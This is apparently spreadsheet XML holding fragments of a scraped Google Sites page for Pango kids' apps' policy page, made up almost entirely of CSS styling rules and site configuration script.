    <t>hover{color: rgba(0,0,0,1); opacity: 0.82;}.fOU46b .a3ETed .Mz8gvb{color: rgba(0,0,0,1);}.fOU46b .a3ETed .tCHXDc{color: rgba(0,0,0,1);}.fOU46b .a3ETed .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}@media only screen and (min-width: 1280px){.XeSM4.b2Iqye.fOU46b .LBrwzc .tCHXDc{color: rgba(255,255,255,0.8700000048);}}.XeSM4.b2Iqye.fOU46b .LBrwzc</t>
  </si>
  <si>
    <t>0;}.LBrwzc .ZXW7w{color: rgba(0,0,0,1);}.LBrwzc .KJll8d{background-color: rgba(0,0,0,1);}.GBy4H .ZXW7w{color: rgba(255,255,255,1);}.GBy4H .KJll8d{background-color: rgba(255,255,255,1);}.eBSUbc{background-color: rgba(255,255,255,1); color: rgba(33,33,33,0.6999999881);}.BFDQOb:hover{color: rgba(33,33,33,1);}.ImnMyf{background-color: rgba(255,255,255,1); color: rgba(33,33,33,1);}.Vs12Bd{background-color: rgba(255,250,230,1); color: rgba(33,33,33,1);}.S5d9Rd{background-color: rgba(251,208,5,1); color: rgba(0,0,0,1);}.zfr3Q{color: rgba(33,33,33,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; font-weight: 400; line-height: 1.56; margin-top: 16px;}.qnVSj{color: rgba(33,33,33,1);}.Glwbz{color: rgba(33,33,33,1);}.duRjpb{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 26pt; font-weight: 700; letter-spacing: 0px; line-height: 1.5; margin-top: 28px; text-transform: none;}.Ap4VC{margin-bottom: -28px;}.qLrapd{color: rgba(0,0,0,1);}.JYVBee{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 18pt; font-style: normal; font-weight: 700; line-height: 1.56; margin-top: 20px;}.CobnVe{margin-bottom: -20px;}.aHM7ed{color: rgba(0,0,0,1);}.OmQG5e{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 13pt; font-weight: 700; letter-spacing: 1px; line-height: 1.63; margin-top: 18px;}.GV3q8e{margin-bottom: -18px;}.NHD4Gf{color: rgba(0,0,0,1);}.LB7kq .duRjpb{font-size: 45pt; font-style: normal; font-weight: 500; letter-spacing: -0.5px; line-height: 1.26; margin-top: 45px;}.LB7kq .baZpAe</t>
  </si>
  <si>
    <t>.duRjpb{padding-bottom: 18px;}.LB7kq .duRjpb: not(.TYR86d):first-child:before{border-bottom-style: solid; border-bottom-width: 8px; border-color: rgba(251,208,5,1); margin-left: auto; margin-right: auto; width: 100px; display: block;}.LB7kq .JYVBee{font-size: 21pt;}@media only screen and (max-width: 479px){.LB7kq .duRjpb{font-size: 30pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .duRjpb{font-size: 38pt;}}@media only screen and (max-width: 479px){.LB7kq .JYVBee{font-size: 17pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .JYVBee{font-size: 19pt;}}.O13XJf{height: 310px; padding-bottom: 50px; padding-top: 50px;}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf{height: 280px; padding-bottom: 45px; padding-top: 45px;}}@media only screen and (max-width: 479px){.O13XJf{height: 250px; padding-bottom: 40px; padding-top: 40px;}}.SBrW1{height: 480px;}@media only screen and (min-width: 480px) and (max-width: 767px){.SBrW1{height: 480px;}}@media only screen and (max-width: 479px){.SBrW1{height: 400px;}}.Wew9ke{fill: rgba(255,255,255,1);}.gk8rDe{height: 200px; padding-bottom: 40px; padding-top: 60px;}.gk8rDe .zfr3Q{color: rgba(0,0,0,1);}.gk8rDe</t>
  </si>
  <si>
    <t>.duRjpb{color: rgba(0,0,0,1); font-size: 36pt;}.gk8rDe .qLrapd{color: rgba(0,0,0,1);}.gk8rDe .duRjpb: not(.TYR86d):first-child:before{border-bottom-width: 6px; border-color: rgba(0,0,0,1); display: block;}.gk8rDe .JYVBee{color: rgba(33,33,33,1); margin-top: 13px;}.gk8rDe .aHM7ed{color: rgba(33,33,33,1);}.gk8rDe .OmQG5e{color: rgba(33,33,33,1);}.gk8rDe .NHD4Gf{color: rgba(33,33,33,1);}@media only screen and (max-width: 479px){.gk8rDe .duRjpb{font-size: 25pt;}}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.gk8rDe .duRjpb{font-size: 31pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe{padding-top: 45px;}}@media only screen and (max-width: 479px){.gk8rDe{padding-bottom: 0px; padding-top: 30px;}}.dhtgD{text-decoration: underline;}.JzO0Vc{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,0.150000006); border-right-style: solid; border-right-width: 1px; font-family: Lato, sans-serif; width: 250px;}@media only screen and (min-width: 1280px){.JzO0Vc{padding-top: 62px;}}.TlfmSc{font-family: Roboto, sans-serif; font-size: 15pt; font-weight: 500; letter-spacing: 1.5px; text-transform: none;}.PsKE7e{font-family: 'Open Sans', sans-serif; font-size: 12pt;}.IKA38e{line-height: 1.58;}.hDrhEe{padding-bottom: 8px; padding-top: 8px;}.dhtgD:hover{text-decoration: underline;}.Zjiec:before{border-bottom-style: solid; border-bottom-width: 1px; border-color: rgba(0,0,0,1); margin-bottom: 30px; margin-left: auto; margin-right: auto; width: 212px; display: block;}.rgLkl{background-color: rgba(158,158,158,1);}.zDUgLc{border-bottom-style: solid; border-bottom-width: 1px; border-color: rgba(204,204,204,1); opacity: 1;}.QmpIrf{background-color: rgba(251,208,5,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.xkUom{border-color: rgba(251,208,5,1); color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.xkUom:hover{background-color: rgba(251,208,5,0.1000000015);}.KjwKmc{color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px; line-height: 22px;}.KjwKmc:hover{background-color: rgba(251,208,5,0.1000000015);}.lQAHbd .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.lQAHbd .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.lQAHbd .xkUom :</t>
  </si>
  <si>
    <t>hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.lQAHbd .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .Mt0nFe{border-color: rgba(0,0,0,0.200000003);}.cJgDec .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.cJgDec .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.cJgDec .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.cJgDec .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.cJgDec .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.tpmmCb .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.tpmmCb .xkUom{border-color: rgba(251,208,5,1); color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.tpmmCb .xkUom :</t>
  </si>
  <si>
    <t>hover{background-color: rgba(251,208,5,0.1000000015);}.tpmmCb .KjwKmc{color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.tpmmCb .KjwKmc: hover{background-color: rgba(251,208,5,0.1000000015);}.gk8rDe .QmpIrf{background-color: rgba(251,208,5,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.gk8rDe .xkUom{border-color: rgba(251,208,5,1); color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.gk8rDe .xkUom:hover{background-color: rgba(251,208,5,0.1000000015);}.gk8rDe .KjwKmc{color: rgba(251,208,5,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.gk8rDe .KjwKmc:hover{background-color:</t>
  </si>
  <si>
    <t>rgba(251,208,5,0.1000000015);}.O13XJf .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,1); color: rgba(0,0,0,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.O13XJf .xkUom{border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.O13XJf .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.O13XJf .KjwKmc{color: rgba(255,255,255,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; line-height: 22px;}.O13XJf .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.Y4CpGd{font-family: 'Open Sans', sans-serif; font-size: 12pt;}.CMArNe{background-color: rgba(255,250,230,1);}.TMjjoe{font-family: Roboto, sans-serif; font-size: 9pt; line-height: 1.2; margin-top: 0px;}.GBy4H .zDUgLc{border-bottom-width: 0px;}.GBy4H</t>
  </si>
  <si>
    <t>.TlfmSc{color: rgba(255,255,255,0.8700000048);}.GBy4H .Mz8gvb{color: rgba(255,255,255,0.8700000048);}.GBy4H .Mz8gvb.chg4Jd:focus:before{border-color: rgba(255,255,255,0.8700000048); display: block;}.GBy4H .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.GBy4H .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.GBy4H .wgxiMe{background-color: rgba(0,0,0,1);}.GBy4H .qV4dIc{color: rgba(255,255,255,0.8700000048);}.GBy4H .M9vuGd{color: rgba(255,255,255,0.8700000048);}.GBy4H .Zjiec{color: rgba(255,255,255,0.8700000048);}.GBy4H .Zjiec:</t>
  </si>
  <si>
    <t>before{border-color: rgba(255,255,255,0.8700000048); display: block;}.GBy4H .PsKE7e{color: rgba(255,255,255,0.8700000048);}.GBy4H .lhZOrc. PsKE7e{color: rgba(255,255,255,1);}.GBy4H .aJHbb:hover{color: rgba(255,255,255,1);}.GBy4H .jgXgSe:hover{color: rgba(255,255,255,1);}.GBy4H .M9vuGd:hover{color: rgba(255,255,255,1);}.GBy4H .j10yRb:hover{color: rgba(255,255,255,1);}.GBy4H .eBSUbc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .ZXW7w{color: rgba(255,255,255,1);}.fOU46b .GBy4H .zDUgLc{border-bottom-width: 0px; opacity: 1;}.fOU46b .GBy4H .TlfmSc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .YTv4We{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,0.8700000048); display: block;}.fOU46b .GBy4H .Mz8gvb{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .tCHXDc{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.fOU46b .GBy4H .qV4dIc{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .M9vuGd{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .Zjiec{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .Zjiec: before{border-color: rgba(255,255,255,0.8700000048); display: block;}.fOU46b .GBy4H</t>
  </si>
  <si>
    <t>.PsKE7e{color : rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .lhZOrc.</t>
  </si>
  <si>
    <t>PsKE7e{color: rgba(255,255,255,1);}.fOU46b .GBy4H .aJHbb : hover{color: rgba(255,255,255,1);}.fOU46b .GBy4H .jgXgSe</t>
  </si>
  <si>
    <t>: hover{color: rgba(255,255,255,1);}.fOU46b .GBy4H .M9vuGd</t>
  </si>
  <si>
    <t>: hover{color: rgba(255,255,255,1);}.fOU46b .LBrwzc .ZXW7w{color: rgba(0,0,0,1);}.fOU46b .LBrwzc .zDUgLc{opacity:</t>
  </si>
  <si>
    <t>1; border-bottom-style: none;}.fOU46b .LBrwzc .Mz8gvb{color: rgba(33,33,33,1); border-bottom-style: none;}.LBrwzc .TlfmSc{color: rgba(33,33,33,1);}.LBrwzc .YTv4We{color: rgba(33,33,33,1);}.LBrwzc .YTv4We.chg4Jd:focus:before{border-color: rgba(33,33,33,1); display: block;}.LBrwzc .Mz8gvb{color: rgba(33,33,33,1); border-color: rgba(204,204,204,1); border-bottom-style: solid; border-bottom-width: 1px;}.LBrwzc .tCHXDc{color: rgba(106,106,106,1);}.LBrwzc .iWs3gf.chg4Jd: focus{background-color: rgba(106,106,106,0.1199999973);}.LBrwzc .qV4dIc{color: rgba(106,106,106,1);}.LBrwzc .M9vuGd{color: rgba(33,33,33,1);}.LBrwzc .Zjiec{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.LBrwzc .Zjiec: before{border-color: rgba(33,33,33,1); display: block;}.LBrwzc .IKA38e{color: rgba(106,106,106,1);}.LBrwzc .lhZOrc. IKA38e{color: rgba(33,33,33,1);}.LBrwzc .eBSUbc{color:</t>
  </si>
  <si>
    <t>rgba(106,106,106,1);}.LBrwzc .hDrhEe:hover{color: rgba(33,33,33,1);}.LBrwzc .jgXgSe:hover{color: rgba(33,33,33,1);}.LBrwzc .M9vuGd:hover{color: rgba(33,33,33,1);}.QcmuFb{padding-left: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200px;}@media only screen and (min-width: 1280px){.yxgWrb{margin-left: 250px;}}@media only screen and (max-width: 479px){.Zjiec{font-size: 16pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 18pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 14pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.duRjpb{font-size: 20pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.duRjpb{font-size: 23pt;}}@media only screen and (max-width: 479px){.JYVBee{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.JYVBee{font-size: 17pt;}}@media only screen and (max-width: 479px){.OmQG5e{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.OmQG5e{font-size: 13pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 14pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.TMjjoe{font-size: 9pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TMjjoe{font-size: 9pt;}}section[id="h.574bec4d7e3a54cb_26"] .IFuOkc:before{opacity: 0.0;}section[id="h.6e401cb7f622b5af_250"] .IFuOkc:before{opacity: 0.4;}&lt;/style&gt;&lt;script</t>
  </si>
  <si>
    <t>nonce="10qaNPQDY0ls00vlWxdoWQ"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL1vzQkzLnE_62RHdMTmkU0CJiVHy5-aGmJW25ZZE_n8b5v_nBiX5ptnueDPa6BPJpvb3yuQ",1,"CJ3souK4pf4CFZ_HSgAdmj8Dow",1681340316038680,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747263,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49823162,49824163,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762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1352646074-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[1681340316049,"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nonce="10qaNPQDY0ls00vlWxdoWQ"&gt;&lt;/script&gt;&lt;script nonce="10qaNPQDY0ls00vlWxdoWQ"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script nonce="10qaNPQDY0ls00vlWxdoWQ"&gt;const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t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="6LjALuPpVlI5UoSJhRpXgA"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="6LjALuPpVlI5UoSJhRpXgA"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="6LjALuPpVlI5UoSJhRpXgA"&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2QrQ39gGwoEJH4zFzYI-YrfbKjsXpLjeOgasU4tE8v9jacv6IDB62FDESmEVFTHuW7WoyL","je":1,"sstu":1681340316230337,"si":"CMbFruK4pf4CFcLJSgAdaTcAHw","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747265,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786302,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49765382,49816165,49822929,49823162,49824163,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347752,50455861,50468091],"crc":0,"cvi":[]},"docs-ccdil":false,"docs-eil":true,"docs-eoi":false,"info_params":{},"atari-jefp":"/_/view/jserror","docs-jern":"view","atari-rhpp":"/_/view","docs-eeytpgc":true,"docs-feytpgc":false,"docs-ecuach":false,"docs-cclt":2033,"docs-ecci":tru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 css?family=Roboto%3A300%2C400%2C500%2C700%7COpen%20Sans%3A400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="k6r4v-izj40lqhXN4DHhFg"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="k6r4v-izj40lqhXN4DHhFg"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Comfortaa%3Ai%2Cbi%2C700%2C300%2C400%2C500&amp;display=swap" rel="stylesheet" nonce="k6r4v-izj40lqhXN4DHhFg"&gt;&lt;style nonce="k6r4v-izj40lqhXN4DHhFg"&gt;@media only screen and (max-width: 479px){.Rn3Z1b{font-size: 23.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Rn3Z1b{font-size: 27.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.Rn3Z1b{font-size: 30.0pt;}}@media only screen and (min-width: 1280px){.Rn3Z1b{font-size: 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nonce="k6r4v-izj40lqhXN4DHhFg"&gt;&lt;script nonce="6LjALuPpVlI5UoSJhRpXgA"&gt;&lt;/script&gt;&lt;title&gt;Pango - apps &amp;amp; games for kids - Policy&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="k6r4v-izj40lqhXN4DHhFg"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color: rgba(0,0,0,1);}.JYVBee .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.OmQG5e .OUGEr{color: rgba(0,0,0,1);}.iwQgFb{background-color: rgba(211,211,211,1);}.ySLm4c{font-family: 'Open Sans', sans-serif;}.CbiMKe{background-color: rgba(251,208,5,1);}.qeLZfd .zfr3Q{color: rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color: rgba(33,33,33,1);}.qeLZfd .duRjpb{color: rgba(0,0,0,1);}.qeLZfd .qLrapd{color: rgba(0,0,0,1);}.qeLZfd</t>
  </si>
  <si>
    <t>.JYVBee{color: rgba(0,0,0,1);}.qeLZfd .aHM7ed{color: rgba(0,0,0,1);}.qeLZfd .OmQG5e{color: rgba(0,0,0,1);}.qeLZfd</t>
  </si>
  <si>
    <t>.NHD4Gf{color: rgba(0,0,0,1);}.qeLZfd .aw5Odc{color: rgba(0,0,0,1);}.qeLZfd .dhtgD:hover{color: rgba(0,0,0,1);}.qeLZfd .dhtgD:visited{color: rgba(0,0,0,1);}.qeLZfd .iwQgFb{background-color: rgba(211,206,190,1);}.qeLZfd .OUGEr{color: rgba(33,33,33,1);}.qeLZfd .duRjpb</t>
  </si>
  <si>
    <t>.OUGEr{color : rgba(0,0,0,1);}.qeLZfd .JYVBee</t>
  </si>
  <si>
    <t>.OUGEr{color: rgba(0,0,0,1);}.qeLZfd .OmQG5e .OUGEr{color: rgba(0,0,0,1);}.qeLZfd:before{background-color: rgba(255,250,230,1); display: block;}.lQAHbd .zfr3Q{color: rgba(0,0,0,1);}.lQAHbd .qnVSj{color: rgba(0,0,0,1);}.lQAHbd .Glwbz{color: rgba(0,0,0,1);}.lQAHbd .duRjpb{color: rgba(0,0,0,1);}.lQAHbd .qLrapd{color: rgba(0,0,0,1);}.lQAHbd .JYVBee{color: rgba(0,0,0,1);}.lQAHbd .aHM7ed{color: rgba(0,0,0,1);}.lQAHbd .OmQG5e{color: rgba(0,0,0,1);}.lQAHbd .NHD4Gf{color: rgba(0,0,0,1);}.lQAHbd .aw5Odc{color: rgba(0,0,0,1);}.lQAHbd .dhtgD:hover{color: rgba(0,0,0,1);}.lQAHbd .dhtgD:visited{color: rgba(0,0,0,1);}.lQAHbd .iwQgFb{background-color: rgba(201,172,34,1);}.lQAHbd .OUGEr{color: rgba(0,0,0,1);}.lQAHbd .duRjpb .OUGEr{color: rgba(0,0,0,1);}.lQAHbd .JYVBee .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.lQAHbd .OmQG5e .OUGEr{color: rgba(0,0,0,1);}.lQAHbd .CbiMKe{background-color: rgba(255,255,255,1);}.lQAHbd:before{background-color: rgba(251,208,5,1); display: block;}.cJgDec .zfr3Q{color: rgba(255,255,255,1);}.cJgDec .zfr3Q .OUGEr{color :</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.cJgDec .qnVSj{color: rgba(255,255,255,1);}.cJgDec .Glwbz{color: rgba(255,255,255,1);}.cJgDec .qLrapd{color: rgba(255,255,255,1);}.cJgDec .aHM7ed{color: rgba(255,255,255,1);}.cJgDec .NHD4Gf{color: rgba(255,255,255,1);}.cJgDec .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0; display: block;}.O13XJf{height: 310px; padding-bottom: 50px; padding-top: 50px;}.O13XJf .IFuOkc{background-image: url(https://ssl.gstatic.com/atari/images/aristotle-header-dark.jpg);}.O13XJf</t>
  </si>
  <si>
    <t>.IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0.5; display: block;}.O13XJf .zfr3Q{color: rgba(255,255,255,1);}.O13XJf .qnVSj{color: rgba(255,255,255,1);}.O13XJf .Glwbz{color: rgba(255,255,255,1);}.O13XJf .duRjpb{color:</t>
  </si>
  <si>
    <t>: rgba(33,33,33,1);}.tpmmCb .qnVSj{color: rgba(33,33,33,1);}.tpmmCb .Glwbz{color: rgba(33,33,33,1);}.tpmmCb .qLrapd{color: rgba(33,33,33,1);}.tpmmCb .aHM7ed{color: rgba(33,33,33,1);}.tpmmCb .NHD4Gf{color: rgba(33,33,33,1);}.tpmmCb .IFuOkc:before{background-color: rgba(255,255,255,1); display: block;}.tpmmCb .Wew9ke{fill: rgba(33,33,33,1);}.dhtgD:hover{color: rgba(0,0,0,1);}.dhtgD:active{color: rgba(0,0,0,1);}.Zjiec{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 20pt; font-weight: 500; letter-spacing: 1px; padding-bottom: 57px; padding-left: 21.5px; padding-right: 21.5px; padding-top: 8px; text-align: center; text-transform: none;}.XMyrgf{margin-top: 0px; margin-left: 21.5px; margin-bottom: 24px; margin-right: 21.5px; text-align: center;}.TlfmSc{color: rgba(251,208,5,1); font-family: Roboto, sans-serif; font-size: 15pt; font-weight: 500; letter-spacing: 1.5px; text-transform: none;}.Mz8gvb{color: rgba(251,208,5,1);}.zDUgLc{background-color: rgba(255,255,255,1); border-bottom-style: solid; border-bottom-width: 1px; border-color: rgba(204,204,204,1);}.QTKDff.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.YTv4We{color: rgba(0,0,0,1);}.YTv4We:hover:before{background-color: rgba(183,153,81,0.1199999973); display: block;}.YTv4We.chg4Jd:focus:before{border-color: rgba(183,153,81,0.3600000143); display: block;}.eWDljc{background-color: rgba(255,255,255,1);}.eWDljc .hDrhEe{padding-left: 8px;}.ZXW7w{color: rgba(106,106,106,1); opacity: 0.26;}.PsKE7e{color: rgba(106,106,106,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; font-weight: 400;}.lhZOrc{color: rgba(33,33,33,1);}.hDrhEe:hover{color: rgba(33,33,33,1);}.M9vuGd{color: rgba(33,33,33,1); font-weight: 700;}.jgXgSe:hover{color: rgba(33,33,33,1);}.j10yRb:hover{color: rgba(33,33,33,1);}.j10yRb.chg4Jd:focus:before{border-color: rgba(33,33,33,0.3600000143); display: block;}.tCHXDc{color: rgba(106,106,106,1);}.iWs3gf.chg4Jd:focus{background-color: rgba(106,106,106,0.1199999973);}.wgxiMe{background-color: rgba(255,255,255,1); border-color: rgba(0,0,0,0.150000006); border-style: solid; border-width: 1px;}.fOU46b .TlfmSc{color: rgba(255,255,255,1);}.fOU46b .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .Mz8gvb{color: rgba(255,255,255,1);}.fOU46b .Mz8gvb.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.fOU46b .qV4dIc{color:</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}.fOU46b .a3ETed .qV4dIc{color: rgba(0,0,0,1);}.fOU46b</t>
  </si>
  <si>
    <t>.a3ETed .TlfmSc{color: rgba(0,0,0,1);}.fOU46b .a3ETed .KJll8d{background-color: rgba(0,0,0,1);}.fOU46b .a3ETed .ZXW7w{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.fOU46b .a3ETed .jgXgSe : hover{color: rgba(0,0,0,1); opacity: 0.82;}.fOU46b .a3ETed .Mz8gvb{color: rgba(0,0,0,1);}.fOU46b .a3ETed .tCHXDc{color: rgba(0,0,0,1);}.fOU46b .a3ETed</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}@media only screen and (min-width: 1280px){.XeSM4.b2Iqye.fOU46b .LBrwzc .tCHXDc{color: rgba(255,255,255,0.8700000048);}}.XeSM4.b2Iqye.fOU46b .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.KuNac.b2Iqye.fOU46b .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.LBrwzc .KJll8d{background-color: rgba(0,0,0,1);}.GBy4H .ZXW7w{color: rgba(255,255,255,1);}.GBy4H .KJll8d{background-color: rgba(255,255,255,1);}.eBSUbc{background-color: rgba(255,255,255,1); color: rgba(33,33,33,0.6999999881);}.BFDQOb:hover{color: rgba(33,33,33,1);}.ImnMyf{background-color: rgba(255,255,255,1); color: rgba(33,33,33,1);}.Vs12Bd{background-color: rgba(255,250,230,1); color: rgba(33,33,33,1);}.S5d9Rd{background-color: rgba(251,208,5,1); color: rgba(0,0,0,1);}.zfr3Q{color: rgba(33,33,33,1); font-family: 'Open Sans', sans-serif; font-size: 12pt; font-weight: 400; line-height: 1.56; margin-top: 16px;}.qnVSj{color: rgba(33,33,33,1);}.Glwbz{color: rgba(33,33,33,1);}.duRjpb{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 26pt; font-weight: 700; letter-spacing: 0px; line-height: 1.5; margin-top: 28px; text-transform: none;}.Ap4VC{margin-bottom: -28px;}.qLrapd{color: rgba(0,0,0,1);}.JYVBee{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 18pt; font-style: normal; font-weight: 700; line-height: 1.56; margin-top: 20px;}.CobnVe{margin-bottom: -20px;}.aHM7ed{color: rgba(0,0,0,1);}.OmQG5e{color: rgba(0,0,0,1); font-family: Roboto, sans-serif; font-size: 13pt; font-weight: 700; letter-spacing: 1px; line-height: 1.63; margin-top: 18px;}.GV3q8e{margin-bottom: -18px;}.NHD4Gf{color: rgba(0,0,0,1);}.LB7kq .duRjpb{font-size: 45pt; font-style: normal; font-weight: 500; letter-spacing: -0.5px; line-height: 1.26; margin-top: 45px;}.LB7kq .baZpAe .duRjpb{padding-bottom: 18px;}.LB7kq .duRjpb:</t>
  </si>
  <si>
